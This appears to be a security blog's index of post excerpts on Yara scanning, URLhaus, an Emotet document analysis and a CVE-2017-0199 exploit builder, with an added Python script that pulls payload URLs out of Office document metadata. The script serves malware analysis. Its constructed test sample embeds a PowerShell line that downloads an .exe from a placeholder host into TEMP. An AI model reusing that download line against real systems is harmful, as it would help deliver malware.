Has it ever happened to you that you wanted to quickly test a Yara rule you had just written, but were missing a large enough data set to test it against? That is exactly what Yara Scan is designed for. You submit your Yara rule to the service and a short while later you receive […]
abuse.ch launches URLhaus, collection of malicious URLs
abuse.ch has recently launched a new project called “URLhaus”. URLhaus is a project with the goal of sharing malicious URLs that are being used for malware distribution. Anybody can register with a Twitter account and share malicious URLs they have detected. The system will download and analyse the payload (trying to identify it) and then […]
CVE-2017-0199 Exploit Builder Python Script
On Monday morning I came across a domain which has directory listing open for several subfolders. In most of the folders an Office Word document called “decoy.doc”, a PDF document named “p.doc” (yes, really), an exe and a Python script called “prothemusL_H.py” could be found: That Python script made me curious and I decided to […]
Extracting Payload Urls From Office Docs With CyberChef
For several months now, Emotet has been using various Office document fields (e.g. Author, Comments) for “hiding” the PowerShell code that downloads the exe payload. The actors behind the malware often change little things in their code to make automated extraction of the URLs harder. On November 8th a friend asked me for help on a […]
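As an added example (not the post's CyberChef recipe and not code from the page): a small Python script that does the same job offline. It opens a .docx, reads the core-properties fields the post names (in docProps/core.xml, Author is dc:creator and Comments is dc:description), expands a `-enc` base64/UTF-16LE PowerShell command and joins `'a'+'b'` string concatenation before pulling URLs out. The document it parses is constructed inside the script, and the two obfuscation tricks it undoes are assumptions chosen for the example, not claims about the specific Emotet samples the post discusses.

```python
"""Pull download URLs out of PowerShell hidden in Office document metadata.

Added example; the sample document and the obfuscation it undoes are constructed
for illustration, not taken from a real Emotet document.
"""
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespaces used by docProps/core.xml in OOXML documents.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
# Author-controlled fields worth scanning: Author -> dc:creator, Comments -> dc:description.
CORE_FIELDS = ["dc:title", "dc:subject", "dc:creator", "dc:description",
               "cp:keywords", "cp:category", "cp:lastModifiedBy"]

URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
# powershell -e / -enc / -encodedcommand <base64>
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# 'http://'+'host/x.exe' -> 'http://host/x.exe' (assumed obfuscation for this example)
CONCAT_RE = re.compile(r"'\s*\+\s*'")


def core_properties(docx_bytes: bytes) -> dict:
    """Return the text of the scanned docProps/core.xml fields, e.g. {'dc:creator': 'Bob'}."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "docProps/core.xml" not in zf.namelist():
            return {}
        root = ET.fromstring(zf.read("docProps/core.xml"))
    found = {}
    for field in CORE_FIELDS:
        el = root.find(field, NS)
        if el is not None and el.text:
            found[field] = el.text
    return found


def decode_encoded_command(ps: str) -> str:
    """Expand a `-enc <base64>` argument (UTF-16LE) so the URLs inside become visible."""
    m = ENC_RE.search(ps)
    if not m:
        return ps
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ps  # not a valid encoded command; scan the raw text instead


def deobfuscate(ps: str) -> str:
    """Join adjacent single-quoted string literals glued together with '+'."""
    return CONCAT_RE.sub("", ps)


def extract_payload_urls(docx_bytes: bytes) -> list:
    """URLs found in the metadata fields, in field order, without duplicates."""
    urls = []
    for _field, text in core_properties(docx_bytes).items():
        cleaned = deobfuscate(decode_encoded_command(text))
        for url in URL_RE.findall(cleaned):
            if url not in urls:
                urls.append(url)
    return urls


def build_sample_docx(comments: str, author: str) -> bytes:
    """Constructed test document: a zip holding only docProps/core.xml."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>%s</dc:creator><dc:description>%s</dc:description>"
        "</cp:coreProperties>" % (NS["cp"], NS["dc"], escape(author), escape(comments))
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docProps/core.xml", core)
    return buf.getvalue()


# Constructed sample: one URL hidden in Author via concatenation, one inside an
# encoded command stored in Comments. Hosts use the reserved .invalid TLD.
INNER = ("$u='http://'+'example.invalid/wp-content/a.exe';"
         "(New-Object Net.WebClient).DownloadFile($u,$env:TEMP+'\\x.exe')")
ENCODED = base64.b64encode(INNER.encode("utf-16-le")).decode()
SAMPLE = build_sample_docx("powershell -w hidden -enc " + ENCODED,
                           author="$x='http://'+'second.invalid/b.exe'")

if __name__ == "__main__":
    for url in extract_payload_urls(SAMPLE):
        print(url)
```

Run it against a real document by replacing `SAMPLE` with the file's bytes; for .doc (OLE2) files the metadata lives in the SummaryInformation stream rather than core.xml, so this script only covers the .docx case.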
Downloadable List of all Swiss Mobile Phone Numbers
This is more of a fun post. I needed a list of all Swiss mobile phone numbers. I created a list for all currently used “area codes” 076-079 and decided to share the text files with anyone. 075 is currently not really used by Swisscom, though it was announced they will start to use the […]